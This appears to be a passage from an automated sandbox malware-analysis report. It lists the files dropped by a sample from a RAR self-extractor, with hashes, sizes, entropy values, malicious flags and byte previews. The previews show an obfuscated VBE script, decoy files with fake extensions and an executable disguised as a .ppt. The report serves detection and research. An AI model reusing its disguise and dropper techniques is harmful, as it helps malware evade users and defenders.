                                      Preview:9mV826q9zAMGJ14708CT87fmcNOFk530L13485ib076985F2417rP0yZiQDuN8St70NX5q72U4Xsx22yf5o34t592156w553sz1J692urlXV4r9CGZ115RM8hAo1K062F2UP3..GuiDateTimePicker DateTimeConstants..C7n60w9Nf5385aOQRGQ1434H8ZAoUt93TW9w39248BN348UaaZSy00K60IQV7tQy86e3Qd220asJ6K..ColorConstants FontConstants..3ll5jR8JX7zb0R12b0AK26V6nM5Gi50Xl913owK2Ly4t3wB6D3jo0RiJ465g5TzHv9n10s4w3..DateTimeConstants DateTimeConstants..LLU4J22Sk28972J5t996809D..GuiDateTimePicker ColorConstants..2L6uMOt5O12MfDln75ejWq27d9x3478ZJ5PcMu3z4198L5EJ57jaWaGYM004MW6bHO2Y5q70Y19V81gsJzmG4H387611..TreeViewConstants BorderConstants..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (420), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):89890
                                      Entropy (8bit):3.0340576559820898
                                      Encrypted:false
                                      SSDEEP:192:IkkkkkkkkkkkkLhkkkkkkkkkkkkWkkkkkkkkkkkkskkkkkkkkkkkkRxkkkkkkkkz:QdB
                                      MD5:9CC31F5D12CE4609EC12D092A028BB23
                                      SHA1:AE3C36DA54C2142A6DC0D2987AD518ACC850F803
                                      SHA-256:1FC30FCF18A2B46D9F3256F069598E0D622615FFC39CF57558BE2B398F59E31E
                                      SHA-512:6E921A8972D1689D48625A4DC9AF744382D0880D7768D6906580E87355CEF39C789CB746DEB93F2E457F2A8CF3A3E6159E001400317051BA8397AA4D635379F8
                                      Malicious:true
                                      Preview:..T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.....T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.....T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\rjhr.pdf

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):34649
                                      Entropy (8bit):5.586154777776895
                                      Encrypted:false
                                      SSDEEP:768:lXC7WQmlFk5gviQr5HlfdIxNMan26hpqsQwlTZvqZEbb2B8n:lXC7wjia5HZduNN2McsQsSZj4
                                      MD5:55BC888147FD7CC3A422713F543596C8
                                      SHA1:748970FBC9A4F80714E0D4FD12D6209F60F2EC97
                                      SHA-256:FF7FC54EADE5736B5805B37BF827E5855A2F71E8D624665539368521A786A8D7
                                      SHA-512:66490BF66436F33B3FF20232E7A095C97F23CFC19C5E9FECBA436853F26ED7055CC3B9219F55B0329B5E656DE601A03FA9ECD9F2298FF44D2310BEAF5966F972
                                      Malicious:false
                                      Preview:k11085i47B098ipIZ397O713A9153F9TV9447A8O8H5my1y..BA7152R96q91a7Ny7hNqIB4d427iaCLIFQ5393u02rS8q72ANHu7v88k..88rO6w538B8928El4Gi1944cV8413542037a..gqPB82C4O682aa3175028f3I037dIV0G490O7g1nP6e4J0Ui79lOi..5zy39Xh71e2Yg5mUo4352696z62Z328xh572U0Iu7WN70G2Z35324Y6f8uys0CzMe7HbY5mETD8X5LqvEA7..u663LUeLk9pED0zkG579EK87H3k17LC8Uobwq892l6qU320039RM3a7Q630Cb2xoIj345w57i..C9ECu9v8729iLky2rf5eV9K8951598I2Mm0aG615HMO1041UV4c9971pVWd..Edd51cjqXrpUu5st46092f8n897YkhNHs610O171Iz590126NX1817wq95sh8CC57l62l3J7..0P6V19I106F862nX264qFA1Nu6h65mcl27471t664yPvL3QUg735OwV3EeX0a5K38Oe7ioC2834W69E3f8Zs09..1795L781Y4qRAKg847Hm8SDCZ1eu4W2ZF9ys83V04U..3gLjtM8TQ6p781y8zn69480UCd246020l6..wP71598C1900839D27X56Sps..1z9DJ7TbTs06r3Q6nbksStmb6Sfi42iF3PTC5r6L233gan..0E2g1B3Z22Ny6U01x804stYL74sc9oj..821csA8952KiM2B3G0E7E594b2Rqsk6xtl2Tis54sEJ3NWXZ4G24Rr3..ke3LB5QUZj4Qi5gDr4w79Cu..68J0w7300016B71m2O4R4Gn788pBV7N2VDNlY4P8b..q8f49e87377v52HW335d29k12gJ7e6908FO33EbBE2eAn00sK9x0T095..p4i8N7f44723O74z5ie66333f1dY4h0122H9k785o489C7i

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\rxappxurje.txt

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):578
                                      Entropy (8bit):5.55462349735179
                                      Encrypted:false
                                      SSDEEP:12:HgjxwyARG+OQkzPJxvqmsmguTt2FnPqfp/cMcuSf5aMwE8Rc:Hma6PJxvoJuT4FSx/cX5UEec
                                      MD5:BD024A03BEDCF16316AB8A1EC87ADAA6
                                      SHA1:0D7003B89301CCF8CDB326C3FCD98E96A60F1663
                                      SHA-256:1BCF4BA6AD5075F633662C184DE0E46B4E5764B70FFCF8840C48BE4679398560
                                      SHA-512:28294B36BA4AB7290010EA826952A4F82A06123987C84B3A91DB90B5AE7B6E538A407933A750AA4619F7D93449A721B648ECB7F256758ABB9FBFAC92C6ACF066
                                      Malicious:false
                                      Preview:92IMS0831753n1742846xcKi98352P20l3g47O5ZDW399nZ3m29Uxc8776oR4lYzAm009q..ColorConstants ComboConstants..79244Qv97071u88o1237p2J8493G0908Sd5J5o4779pOhuH7U4XnE1p0F17F897gWg05j2g4pQ..BorderConstants ColorConstants..KfWc404R3PM8N81xlyh1WRs100d477r11Bes0ln48M3pmr6eJ7803c141R70I3DaQ0s4Y9..ToolbarConstants ComboConstants..yd145r1VGKW045ArLepx6932WX1Q5Lqo356601609scn0RX0ccNGc41UZOrg9x089TImZ..TreeViewConstants GuiDateTimePicker..m4779it98iBSS2H41B3DZqR04pp0S3zpWI5A0Bh3C2Y93f5H07muh7E663vdnbI2J3m518HU118fT1YW656yg7WV1ksd16F64n363W35493a15nD783FNq..FontConstants StructureConstants..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\ubddmvlr.jpg

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):506
                                      Entropy (8bit):5.616383312872459
                                      Encrypted:false
                                      SSDEEP:12:wCixLARfyJKz++SGUVxSKvKuE8R0RcdbgXsyy/UJ:wB+VsKSrVEKSuEeic2X6/UJ
                                      MD5:E167B220B80135A631F589043CA899B5
                                      SHA1:0E0850082F18334CD783DD174345934AED7221C5
                                      SHA-256:819EA1F99B61B3DC631F935EB6C5876034F373EB1EC4FEC2DB8873523696C518
                                      SHA-512:CC5FE2989BA6C3BCE2310C28D0398500436E65DB6B8EEA08387C99E5871E2AACBAE908A4B1C89B57EF1847A40FFEE82A1777B4577EB01E7235176566CA965C86
                                      Malicious:false
                                      Preview:4v826462174I5lWO87q6wXTVA0E49B3QnrKH2N7g11zT0u29S8ePHlTi7zW34Z43sD4wzvDa1oi4UO350og4m5816Ns54m8Fqzf8P6s16c8bTtx48d5X7W66N2VJ0u392M55eI16MDUL5I45d120LX38ru..ToolTipConstants BorderConstants..PZA2O6qX86c988XJ1519vG92kE5ig9iu6cN63Y819775T13S6kMC05aTUo4rD7W7360W1Xo2LI86c64gGp2F5s021Z4FAJm6vL0oBj9i19nSS974za8420R9QH0k2le..FontConstants StructureConstants..1d50bx51ta0851Ip0QK9C24Fk6i74462M4rxe147T2K78M68yRRW0ROzqxqgQ4q8Zt3e2fDmLMxK53K0sJ4hVF1Qkgp5R8W66e5X450B5T33k12p62eCO..StructureConstants FontConstants..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\ulgwpj.dll

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):519
                                      Entropy (8bit):5.630465665150215
                                      Encrypted:false
                                      SSDEEP:12:jWMubVd2pSlVcmR9Sz2nf9+xTkRJx72COem0uc:VlSjFRNdbIZem0uc
                                      MD5:70C69AA9F7B1E888CA0714E89BE32098
                                      SHA1:4F4BB1D33E921CF93182936499BFDF16A96F7F97
                                      SHA-256:7ADB1E9738343F7EBE30EF6B7F6650FFFEE059EC22D98EBF17DC135E2C835B2F
                                      SHA-512:A01EB39E1FBC1A647D316264260B8C1748F1C49509342B04547B94BD09FDA4B26FA04AA6D10C799A1426AE69746A6A2383E6963CEBACF3E66194E295C13E686E
                                      Malicious:false
                                      Preview:o34Jj1t91U565ClVMKU1I5n2xfyn87qi2UB9zlU0X1mIwt0c0L6Q7e2J04875mn0620d2J269QAZp6eb9H2..DateTimeConstants GuiDateTimePicker..77654f..GuiDateTimePicker GuiDateTimePicker..T3041v39DD4mkVxX2Y8566G1v1h653q5N9G1gU0ETYJEfK8Z3h3088i9gO97o07594O4fX7vmV2KAcPQ0v8LI27vfQIcc8L62WkOLb26939dcVH5o2WP69O1L8D895mqg2V4h4O67fN810W0kegQUq255cEoB0kzM0Z5C3O23zOdd18..GuiDateTimePicker ComboConstants..33Hmaj5J68xO0L35m081004Ei5T5903S9Ja9u09252705gc6unJ89h8rYx67aJK1369AmGu0zw8bK2354g79n34t7m36XyN7dZ4c0..GuiDateTimePicker StructureConstants..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\wdfnhena.jpg

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):551
                                      Entropy (8bit):5.464724766594262
                                      Encrypted:false
                                      SSDEEP:12:u/nl+yfdZlvaE2S0GjIAVSmf9lQLITUu7rBPuq1qy2Xva/XR:fyFbx2JyS69OLIhrrgP/SR
                                      MD5:F6DE4EFF7A4743ECFB4FE11E27DDE3B4
                                      SHA1:B451BE4E2C5A0873AD0A69D4855D75CB065A06BE
                                      SHA-256:2F77B1B7FE13AA79B41995F99BE0EF1B85B492C30B594DEAF0239257C72A5BFE
                                      SHA-512:0D0470CE4514A6A6951847AC61F5D09AB99E4B064FE4AD8E21A4F8AFED68D56BD996EDA5392AE6E8BE5C4824B884E85D76A4511872386873557D4730C5ABBE9C
                                      Malicious:false
                                      Preview:DF3853Cv6G2uAvl9O8a03egwF4zKBMW8DT8F..UpDownConstants BorderConstants..ngD9b3GQ8VOF526bx..ToolbarConstants DateTimeConstants..0ZB2P1YA03zsxrOH71yMgRL56389398XddRO963kkRSN..FontConstants BorderConstants..7JO3CW7xBwJ5y4K43DNh6KCj9OT1jd1Ew8tp6201r2nCb..ButtonConstants ComboConstants..c985j8iDQC971U5Y3T773tV5518dH48VL29WUQm0A026K285qx161tcw0Es15vs5JgQJm3u43gvB..StructureConstants TreeViewConstants..4j1k4nK3ObA65TO265579892TH94a2C7Y7l6B76q5s7Qz50b06766dCMI9N16..ToolTipConstants ComboConstants..K3os83FI0IhD875J2nu..DateTimeConstants ToolbarConstants..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\wnfj.docx

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):639
                                      Entropy (8bit):5.602648525665025
                                      Encrypted:false
                                      SSDEEP:12:EuAcO3XlFyzyVP21+KTizbQQ21BP42OHLLWHwl3MxKoH9Rd9qqPlWSOC7uWk:EUOHlWy4YKOz0Q21JoASu3dxP+6Zk
                                      MD5:D0C528931B9B927B80B3FF7191E579EB
                                      SHA1:2060A0C27AB1C778D6B70828C2DFF9D1059E1A70
                                      SHA-256:466DB50BDC62D3C43698CF27D34FF2589782A4C81776DD3D79AAC808208FB512
                                      SHA-512:D508F51FA8CBD713BF9CC426D175193C1D78B670D193A9C1037B4B8C3E89E76F1CE712C74A2917CE81A8B8BBC5A28F1118DB1938BB9880EBCE5241813D0E55CD
                                      Malicious:false
                                      Preview:l4eS1vLhg329by80Cr512210213opL99SyvX9jY9b82566q02W5a3G61O9845Y43549g8KvCLM2hIcF4OU0qb1dq82F4Tm566258E98082l..TreeViewConstants ToolbarConstants..QclN133d1Xdi55O1Dv59y2qL9x4d6eh5woj68u0AHV134C4cpP18p6m2Xq8H65597J52l4hImFd878nw81..FontConstants TreeViewConstants..Gleu275qKt3xw..BorderConstants DateTimeConstants..LD3Y034412Cyv93x9Y96Mi75899PWb43bphphSr9qclQ3u70o55884u79f8e8XBBpi358P8cUj024rnOb..StructureConstants StructureConstants..Dk6W083Uohe2V6aL2P7bX204YIg3Au21W113f2r965098PZ01d2H53c99qhz22287719T5Q715E32a7S34PD789Dr0M5748h01xM75i8pwQv34G84Lo8kd4aEJt7amEFD4QZsO4RH768p825AF6q7iOg22f06pTCgNiVX37zn..ToolTipConstants UpDownConstants..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\xbdarhjg.icm

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):568
                                      Entropy (8bit):5.5561410123959805
                                      Encrypted:false
                                      SSDEEP:12:V8/EbUgzwRzDaaoTdvq8ZcYij13oADRywploryNBc5Qa3IPqUGvxTPrBPc:rwiKartqacYijCAtyAlormI3IyUGvtO
                                      MD5:F1A870694962DA77AF70D0D8180AF415
                                      SHA1:3686ECC61CF21D56C70C7F71160CC0ABC5D438D3
                                      SHA-256:2E3AC55B4C9E18CC1B11F739089EB6A0382AB64DF61D7FFB60B6E21B1A3B2852
                                      SHA-512:74CE196CDBDC9F308DBA90E8146768FDC7AEBEF286B028F741BED0903C3A68FEB820C1FB46B021F804DEFAE8647C1AC0309EAC3AEE320B22EC3011FAD9F3B6AB
                                      Malicious:false
                                      Preview:7doUr0WOs6Q7hdA355013Q1YC3lIKjAF37D5m1195tL7fa4pg2IQ69iFuA0Ja1yd14ThC9jVz248Cv825do0ZO88u160Aoku7j10Ek23uJ739X130M871fH5T8TT28e72Iwvn8XA6Ta7879OqL..ToolTipConstants BorderConstants..89h5V3250i86Bx8221dhTaME99T77P77pz1TA596j858i4yR6xi11xCk8as220531O3o2874fhj7T..ButtonConstants StructureConstants..D778Tr9Cs5pA16175pum81cnj7AT0E8313py59iipwQ1..ButtonConstants GuiDateTimePicker..VMW60ld653KZ3g103o028764Jt3c7CD..UpDownConstants ComboConstants..bxgd91A8C9SReE238cjAgwE7EZhm448IM7241g308u304j4h91la94oNV997MB6fmFdAh42f6Cvd21XUy1PjJ1..TreeViewConstants TreeViewConstants..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\xdgrnj.pdf

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):114364086
                                      Entropy (8bit):7.089953620024949
                                      Encrypted:false
                                      SSDEEP:12288:lqYTpLqYTpCqYTpGqYTpMqYTp4qYTpGqYTprqYTpOqYTp9qYTpjqYTpuqYTp+qY0:s1
                                      MD5:3F2E528480F94C8DB48BE4427CB904FC
                                      SHA1:2E8C1007444E32B481B87AD89FE0DF37A0BD1BE8
                                      SHA-256:9066F65824D720DFE4B8EEDB19C196B10846A84CA78B7637C0D6632409B3C53E
                                      SHA-512:A40F02857F1BBCF4B764476708D4B5A10A7F0968D0EB9BE301D0881D77187207715B987587140ACBA4D38B062C5FF96836D21A8EAC2A9A540F8E13448A337964
                                      Malicious:false
                                      Preview:..;..#ch.UJ...4.........R.T..."?..R...X.eD..bi..G}cW$...Q.e.nR~.@.....vhlM..f.bD=...x%/A/b..C..O........#.c.s...2:........eS.W.J...j.Q....l"...9. .......l..%S...=........R..U9...%..../...c...L.T.Y....D...n...'..=.y%....f@v.....Gi.4^g........Q...E"..q..D.-&.....D..E...v....t.)....y/*jxW=... 4uzY.....{f.>n...#.....#.2;.)....b2(.|M*....$ic..Lr~.f.*.z.#Dl.....;......j.w.D......b..8..U.q.ZWM!...Kf........GW..Ecc....[...."&Ji..K..../!Ai.....'..}<.-A..gR.J...8U>.)....:p.J.,.)....=-......eg.O.`,u..y.~..l..../.Tg.^*.l....m..VT4.(.c...1k`....%....L........s...Hj..1......!uk.:..B....P.,I]*..Z..Oo. 8..U...4o.L.....@.@......m.`4Ukj.P!.."..............i....&.2.tr. ,A..=7vs..ec..../....Hf;r..q.>...j..3 ..R).j.....Z.t...L..;....m...:..I^#@A.#...c(@.......Y.....-...G.M..1..i$'%.Xk'....2.5.h.o.E.5.0.5.3.1.w.1.E.k.4.9.L.2.o.E.5.5.h.8.4.8.q.5.d.L.9.8.5.z.....B.1.L.6.q.7.L.5.5.r.M.1.8.3.i.K.3.8.1.1.Z.7.2.6.0.6.o.8.6.L.M.0.x.X.5.S.R.B.5.4.....b.7.I.S.

                                      C:\Users\user\AppData\Local\Temp\RegSvcs.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:modified
                                      Size (bytes):45984
                                      Entropy (8bit):6.16795797263964
                                      Encrypted:false
                                      SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                      MD5:9D352BC46709F0CB5EC974633A0C3C94
                                      SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                      SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                      SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                      C:\Users\user\AppData\Local\Temp\afda\axha.icm

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):537
                                      Entropy (8bit):5.605243272883823
                                      Encrypted:false
                                      SSDEEP:12:FjfgTkvCgqvvhYuZaSsOGKrCTMYWHKGg5erBP1j9RviwdxQAFPL:FjmkvCgqxYuZkYCIYU0erplDdxH
                                      MD5:F982A60E5F1B14C79FC141B895CC766C
                                      SHA1:2ECC98EA11167D0692D64FEB812E1E648503EA4A
                                      SHA-256:E019E67A0F7EC0696FEBB0DC7C6BCC727AAE6079AC6AD3FA23E7BF8A099214AA
                                      SHA-512:9E1CD62BA25C58E71D7639451C61EE9552EABA25E1E2E969ECC1E3C21DF1D339B939B2E1952142D2EB1A2969D494272FC8C391F01F9438B770CD227ADC4FFE96
                                      Malicious:false
                                      Preview:Sia21q25..ToolbarConstants BorderConstants..98xRq36y95DaGzM1R0H259..UpDownConstants FontConstants..rA024c9ph4V27w6hVjcX7912W9CkI92S37nZveKVW85fRN3A20Oaz79WTa46478128ThL65z8d6VuQnQ7y4I131B7768UWwm15Z6CwIk8174Hl54V9oG2a1K23V3v1N50t4FRC1301Jmg1g0d1695ZL29uL6gxbsV89TIR6181SZOD..BorderConstants ToolTipConstants..pb035oc34YhgKP947PsExG664m5t27X225wN0140es87e54rsE884Wvz5zj3OjVan67gUx6..StructureConstants TreeViewConstants..4Uz182p4p9QT986y4V7B8vZ1ixymR57JOv0m0c7QJuwORt79oC7T2F65NGv3qbbDLOLpl4sx8NT5438v..TreeViewConstants ButtonConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\bbgsq.mp3

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):544
                                      Entropy (8bit):5.632129400085251
                                      Encrypted:false
                                      SSDEEP:12:ZtFHc2i5d6R9c9Kn9NhSnrFWNVRF8MNQZPsEXEF4+f9CVxfh:ZtF82i5d6/Zn9N8ned6W+LuCzh
                                      MD5:6067AC7E038C2BFDFB972A778A59B502
                                      SHA1:6E271F05DBC646815F80E066278533E679D7E623
                                      SHA-256:6059FF208EB32CA458348D8090BB816F44DF314A45FA150505EAA1CDE10C64C9
                                      SHA-512:C38F9045FB97784546E8C0530C265DB7090C0C48F68A38707294258C15C9D08567B08255D16AA715215F6A4B1F90F4F2932BB022F50E74CD9371213CCCE1ECCB
                                      Malicious:false
                                      Preview:1w550f88yNMY305CLkv3T0cKo6ME19fL231JW3dZ81tG54a2eIsJ28X6p91Pcq85Sgbz1t507afppX0Bi6nR190GN0w7R6x8..BorderConstants GuiDateTimePicker..L37x74094AirySff72Zd7I4y9vOz2Rq71a0mr34w0rFabvn70OUg358TF52hO779xOZAmPBx247C03S4N2HW1blLF49R97WNn4s939P85B23cvK7C13Y86mYI6RX..FileConstants ColorConstants..d4sM7n5Wm599751RQCeVdt44P18md7iKRd3737uY4N18r8B540IH29e0T1A206DO0c1s65X9XOF625uZ6e7G0..TreeViewConstants ComboConstants..r3RX34B6512JJD3b1pp6z6218Y1U2uJ717uQ4cpf8834J6SRf0kr742c98y8019q163u32Cy9590H73Y6Ai9H8t7tJ59QV38e5..StructureConstants FileConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\bocmvwxai.mp3

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):535
                                      Entropy (8bit):5.538141917200933
                                      Encrypted:false
                                      SSDEEP:12:KTqHYhQZu5KfFu/YCMuZH5OvJ/QZ35sxtbw343gn6FUJ:KlhcuUYlZH5Oi5sDbTY6FUJ
                                      MD5:AF67F6BBD092665560CCA8A81115F98E
                                      SHA1:3E182E87A2FEC52365F75827FB97E3EFADEAE0EC
                                      SHA-256:B18EE92E84E90F07567CEF8A354D820D3A8F973AFDD973D8630804C6F731E991
                                      SHA-512:0A0CE38A8F7E2944C460B4A16B2221A85E1E55ECD86DBFD97B4C60505AAEB2D1EC2AE9C2C50574C082FE742368EE9BDDB554AD57E7B2BB28542B78AB04FD7799
                                      Malicious:false
                                      Preview:h43683999py64w59T1q50g8bTT99SmaofkilIl3119A26bC6f74Fk9Bb57Y..DateTimeConstants FontConstants..v7U40Q840QVa49Sh949doUJ1OtMG3AH945..UpDownConstants ButtonConstants..a2mp8V8ZvL006kg691UN32228x5A09Td4gO9CZ50HGO39dBQ6il6v270B616dRrL3..FontConstants FontConstants..1iqYH3D66Awhy4e144T4CWo99d04i07f0K58d8T051rJ0L06hsg0P656P4oh7G67vU8rV030Hn2pEkpM3803oW913s42YkiiOmiCy927K300ZUx5Gm9pAD4..FileConstants BorderConstants..nRg1yLi84rup919Pxj1374h55046PqM3U789N37WR6472X57xF860y40h27p9SY4Z6Dz32902MMJu035Pypl7ge5..StructureConstants FontConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\cbpeb.bmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):571
                                      Entropy (8bit):5.6091271054185805
                                      Encrypted:false
                                      SSDEEP:12:XnXxxTH2ozv4MK24RoXdPqG3x0vh4wjCPrBPeVWEkpd6XaTt1pk5C:XnhxCSgzuXQA0Z1WM0Ek/8aTbOQ
                                      MD5:C2C7D019161BB6D62F73528BFE2ED7B5
                                      SHA1:6F109FE18E7D094D1145F5B177C65F187F0AA1C0
                                      SHA-256:B2E334371BB7984DC84BC1A4D009993653DBDAB8141A7736F030496B0CCB6EED
                                      SHA-512:15FE3667791D933C49B8605140ABD61CC258DA2DA1E97799A8BC7583702881DA4E0E629325A74B0CC22F2A5EFB49333892BFE8470206788B73A762F710356023
                                      Malicious:false
                                      Preview:y13lN32ktH3BbZm934rumK09SON4MbK9R01zfM4h3qzL750..FileConstants ToolTipConstants..ku57Uq83B68K23nQ10o9S447x2226l7z00Ut3E7A3694OVo3fWM6gzDiz49fPguzlT343gb3e1b6yHTV7QbsdG640s701H44WLLK64s9Q2R9c..TreeViewConstants GuiDateTimePicker..X9xj3p3975914b74w4m6sP7Y29C6x8H5BdQY6ap318Ds35m16631I3E7cde4p000zo2l6290fH085J64452bjt82R9IL1370B4uw7fhWxzdVrXDsNa44..TreeViewConstants TreeViewConstants..3G58078Y36423eZ78780Dec144115WeXw85za91E874pw457g5reAE918AGW81Ok80w4Su2Hr9T6W4331z3uv0nhC7T2bUMYS02nW91I89t44aSQ8zVZ7473X6Z3L2J14e0O84831230On4298v06v1..GuiDateTimePicker ComboConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.629681466265794
                                      Encrypted:false
                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.629681466265794
                                      Encrypted:false
                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                      Malicious:true
